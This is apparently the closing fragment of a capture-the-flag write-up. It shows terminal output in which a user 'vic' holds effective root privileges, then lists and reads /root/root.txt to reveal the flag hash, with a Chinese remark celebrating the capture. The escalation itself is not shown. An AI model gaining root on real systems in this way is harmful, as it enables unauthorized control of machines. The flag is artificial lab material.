uid=1000(vic) gid=1000(vic) euid=0(root) egid=0(root) groups=0(root),100(users),1000(vic)
bash-5.2# cd /root
bash-5.2# ls
root.txt
bash-5.2# cat root.txt
0785ded6dbb7e73959924ad06152eabc至此,得到flag!!!!
